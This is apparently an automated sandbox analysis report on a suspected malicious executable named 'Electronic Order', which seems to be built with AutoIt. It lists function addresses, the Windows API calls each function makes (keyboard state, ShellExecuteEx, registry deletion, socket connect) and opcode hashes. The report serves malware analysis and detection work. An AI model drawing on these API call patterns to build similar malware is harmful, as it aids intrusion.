                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52b7b42cb65c9e5f8dad0cc539310a556fa8013dd2fd57ea9dd3be426d8cf8f6
                                      • Instruction ID: c023e70d1d4a52a7bc4bf21f752acfd3a0d993fcc4b91be944f056ca72d52d7e
                                      • Opcode Fuzzy Hash: 52b7b42cb65c9e5f8dad0cc539310a556fa8013dd2fd57ea9dd3be426d8cf8f6
                                      • Instruction Fuzzy Hash: 9E714B3890411AEFCB049F58C845EBEBB79FF86324F248159F915AB252C734AA51CFB4
                                      Function 00E4B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(015A4E28), ref: 00E4B6A5
                                      • IsWindowEnabled.USER32(015A4E28), ref: 00E4B6B1
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E4B795
                                      • SendMessageW.USER32(015A4E28,000000B0,?,?), ref: 00E4B7CC
                                      • IsDlgButtonChecked.USER32(?,?), ref: 00E4B809
                                      • GetWindowLongW.USER32(015A4E28,000000EC), ref: 00E4B82B
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E4B843
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                      • String ID:
                                      • API String ID: 4072528602-0
                                      • Opcode ID: b7b8b356100c64cc7674248a83de4b49ebb2fc372ccc16213c47ccb39b853bb7
                                      • Instruction ID: ed42d88f36e028eeca0616da8357eb7bbfd3bb18c020a2646f79b33747645c02
                                      • Opcode Fuzzy Hash: b7b8b356100c64cc7674248a83de4b49ebb2fc372ccc16213c47ccb39b853bb7
                                      • Instruction Fuzzy Hash: F671BE34A00204AFDB249F65E898FAA7BB9FF89304F1551AAF949B7261C731E941CB50
                                      Function 00E3F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E3F75C
                                      • _memset.LIBCMT ref: 00E3F825
                                      • ShellExecuteExW.SHELL32(?), ref: 00E3F86A
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                      • GetProcessId.KERNEL32(00000000), ref: 00E3F8E1
                                      • CloseHandle.KERNEL32(00000000), ref: 00E3F910
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 3522835683-2766056989
                                      • Opcode ID: 561168bf373931c2b074348c9409bcd9f1f5d50be4978cc9bf856b94d49b427f
                                      • Instruction ID: fff7abb672548c1eb4b2f06408ca816d13e9d3e65b71335ac605b3ccb04cf8e1
                                      • Opcode Fuzzy Hash: 561168bf373931c2b074348c9409bcd9f1f5d50be4978cc9bf856b94d49b427f
                                      • Instruction Fuzzy Hash: 2B619E75E006199FCB18EF65C499AADBBB1FF48310F14846DE84ABB351CB30AD41CBA0
                                      Function 00E2145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 00E2149C
                                      • GetKeyboardState.USER32(?), ref: 00E214B1
                                      • SetKeyboardState.USER32(?), ref: 00E21512
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E21540
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E2155F
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E215A5
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E215C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 7c6630cbceb1ea23e939b8db73fb6129a401b1e52a340cb0a4792349cba7fa64
                                      • Instruction ID: 3aa9cca3c073b8cc97bb7e662cf59785b70439de040bb173a446382044b1398f
                                      • Opcode Fuzzy Hash: 7c6630cbceb1ea23e939b8db73fb6129a401b1e52a340cb0a4792349cba7fa64
                                      • Instruction Fuzzy Hash: A15104A0A447E53EFB3246349C05BBA7EE95B56308F0C54C9E1D9658C2C3E8DEC4D750
                                      Function 00E21276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00E212B5
                                      • GetKeyboardState.USER32(?), ref: 00E212CA
                                      • SetKeyboardState.USER32(?), ref: 00E2132B
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E21357
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E21374
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E213B8
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E213D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 8a72f88718ffe3962e1a9ef71d5ffb38cd8093a09726285c179b8a1e88ad517e
                                      • Instruction ID: 55f11056aff209d66c52adccbe898fba429e6b46df46c5766c61e3f6a2f246b4
                                      • Opcode Fuzzy Hash: 8a72f88718ffe3962e1a9ef71d5ffb38cd8093a09726285c179b8a1e88ad517e
                                      • Instruction Fuzzy Hash: 2A5139A05043E57DFB3287249C05B7A7FAA5F17308F0854C9F1D8668C2D395EE88E760
                                      Function 00E2589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$LocalTime
                                      • String ID:
                                      • API String ID: 2945705084-0
                                      • Opcode ID: 15ddd74b802ee4fe7fdcc25098123735c90a84b93941449c6eb3c64aa9d62f64
                                      • Instruction ID: a5abb4d583352b4bc32723fa249efaceaf91b93674959ca4aff7a95103bf7a22
                                      • Opcode Fuzzy Hash: 15ddd74b802ee4fe7fdcc25098123735c90a84b93941449c6eb3c64aa9d62f64
                                      • Instruction Fuzzy Hash: EA41AFAAC2026876CB11FBB5888B9DFB3ACDF04710F509866F518E3121E634E714C7B9
                                      Function 00E1DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E1DAC5
                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E1DAFB
                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E1DB0C
                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E1DB8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: ,,$DllGetClassObject
                                      • API String ID: 753597075-2867008933
                                      • Opcode ID: 02446b430e9583f939536bf5259774f20fd413c73481fb24b240f6261d23ef74
                                      • Instruction ID: 290ff33dea09c85473f5a004c635c54e126aa2356f39d1bbe8555f6ebc368db0
                                      • Opcode Fuzzy Hash: 02446b430e9583f939536bf5259774f20fd413c73481fb24b240f6261d23ef74
                                      • Instruction Fuzzy Hash: 5D418FB1608208EFDB15CF55CC84EDABBA9EF44310F1591A9ED06AF206D7B1DD84CBA0
                                      Function 00E238AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E238D3,?), ref: 00E248C7
                                        • Part of subcall function 00E248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E238D3,?), ref: 00E248E0
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E238F3
                                      • _wcscmp.LIBCMT ref: 00E2390F
                                      • MoveFileW.KERNEL32(?,?), ref: 00E23927
                                      • _wcscat.LIBCMT ref: 00E2396F
                                      • SHFileOperationW.SHELL32(?), ref: 00E239DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 1377345388-1173974218
                                      • Opcode ID: bfc3d8f9fd9e7273d9ac594d44256b7719fb73a557af9ba6f2db1b1b8944337f
                                      • Instruction ID: 52abe5b3d2cb241b2b99621089335615584f6f1eec511fd9479070e8922f140f
                                      • Opcode Fuzzy Hash: bfc3d8f9fd9e7273d9ac594d44256b7719fb73a557af9ba6f2db1b1b8944337f
                                      • Instruction Fuzzy Hash: 084183B15083949EC751EF64D441AEFB7ECEF89340F00192EF489E3151EA74D688CB62
                                      Function 00E47500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E47519
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E475C0
                                      • IsMenu.USER32(?), ref: 00E475D8
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E47620
                                      • DrawMenuBar.USER32 ref: 00E47633
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                      • String ID: 0
                                      • API String ID: 3866635326-4108050209
                                      • Opcode ID: 6c0760203d542ce5a226afe9c9d5b2176116396570fe880e8528ddb85b3291e3
                                      • Instruction ID: 61abbeb9c34dab9a3c4a94db876bd5bf1c43199cdb1cb74ce66cd916ab794578
                                      • Opcode Fuzzy Hash: 6c0760203d542ce5a226afe9c9d5b2176116396570fe880e8528ddb85b3291e3
                                      • Instruction Fuzzy Hash: AF416974A04608EFDB10DF55E884E9ABBF9FB04314F058069ED99AB250D730AD44CFE0
                                      Function 00E4122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E4125C
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E41286
                                      • FreeLibrary.KERNEL32(00000000), ref: 00E4133D
                                        • Part of subcall function 00E4122D: RegCloseKey.ADVAPI32(?), ref: 00E412A3
                                        • Part of subcall function 00E4122D: FreeLibrary.KERNEL32(?), ref: 00E412F5
                                        • Part of subcall function 00E4122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E41318
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E412E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      • Opcode ID: 7b60beb70e7d591b2200118638b8f0ff19c29994a92c91e1df0fad669a15d7b7
                                      • Instruction ID: 4b406f84cef87f3e2f94fbcd43bf80b52102351ebfe02beb16c38fb1c6034515
                                      • Opcode Fuzzy Hash: 7b60beb70e7d591b2200118638b8f0ff19c29994a92c91e1df0fad669a15d7b7
                                      • Instruction Fuzzy Hash: 11314BB5901119BFDF149F91EC89EFEB7BCEF09304F0001A9E501F2151EA74AE899AA4
                                      Function 00E4653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E4655B
                                      • GetWindowLongW.USER32(015A4E28,000000F0), ref: 00E4658E
                                      • GetWindowLongW.USER32(015A4E28,000000F0), ref: 00E465C3
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E465F5
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E4661F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E46630
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E4664A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 107049982258426b811b462b66958391a478c964fe4ef7c608dbe45d4271df9a
                                      • Instruction ID: ab6e3e1f777897b23b6ada3ba0096e492a7f20b66e0d8ef62365e8dcf387c179
                                      • Opcode Fuzzy Hash: 107049982258426b811b462b66958391a478c964fe4ef7c608dbe45d4271df9a
                                      • Instruction Fuzzy Hash: AF313534604210AFDB20CF19EC84F553BE1FB4A718F1A11A8F509AB2B5CB75EC44DB82
                                      Function 00E36486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E380CB
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E364D9
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E364E8
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E36521
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00E3652A
                                      • WSAGetLastError.WSOCK32 ref: 00E36534
                                      • closesocket.WSOCK32(00000000), ref: 00E3655D
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E36576
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 910771015-0
                                      • Opcode ID: 1428352cdca54f5c842c4c996182bfe17451cb9c157494e180ee37865b18b6ac
                                      • Instruction ID: df181c043a13bdbb716aad8b2888805c019abc7a2a68dde695eee841a8c84d67
                                      • Opcode Fuzzy Hash: 1428352cdca54f5c842c4c996182bfe17451cb9c157494e180ee37865b18b6ac
                                      • Instruction Fuzzy Hash: 8231A135600218BFDB109F24DC89FBE7BA8EB45714F018029F909BB291DB74AD09CB61
                                      Function 00E1E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E1E0FA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E1E120
                                      • SysAllocString.OLEAUT32(00000000), ref: 00E1E123
                                      • SysAllocString.OLEAUT32 ref: 00E1E144
                                      • SysFreeString.OLEAUT32 ref: 00E1E14D
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E1E167
                                      • SysAllocString.OLEAUT32(?), ref: 00E1E175
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 7683c5cd0fe793030b9404bfe714c41cf435522441b9dd411eb25ea0a7faeb95
                                      • Instruction ID: 860ee337807efc06942db9c118b1dc5689225588ee879a98ac04a0f3c9d9e22f
                                      • Opcode Fuzzy Hash: 7683c5cd0fe793030b9404bfe714c41cf435522441b9dd411eb25ea0a7faeb95
                                      • Instruction Fuzzy Hash: 16217136705108BF9B10AFA9DC88CEB77ECEB09760B508125FD15EB360DA70DC858B64
                                      Function 00E1FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      • Opcode ID: b234d6fba0a0e9a729ff24bce4d4bd07b5d053fcdaa63bfe06a8e6c8cb0e14f9
                                      • Instruction ID: ae58b42b71e3396f66eeaaad6c42c86d757d1fb9fd297a4a3152ad580213be1c
                                      • Opcode Fuzzy Hash: b234d6fba0a0e9a729ff24bce4d4bd07b5d053fcdaa63bfe06a8e6c8cb0e14f9
                                      • Instruction Fuzzy Hash: A92167B2208251A6D330F621DC12EF7B398EF51344F54543AF886A7141EB50ADC2E3F9
                                      Function 00E4783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DC1D73
                                        • Part of subcall function 00DC1D35: GetStockObject.GDI32(00000011), ref: 00DC1D87
                                        • Part of subcall function 00DC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC1D91
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E478A1
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E478AE
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E478B9
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E478C8
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E478D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: d04ae392f7e391113d2560df9b1de753a00b8b478400cc0e953c8b845f02e77d
                                      • Instruction ID: a027717172a8d1cf6bf80f625fef8f080c34b391657a6207f713e38add7043c1
                                      • Opcode Fuzzy Hash: d04ae392f7e391113d2560df9b1de753a00b8b478400cc0e953c8b845f02e77d
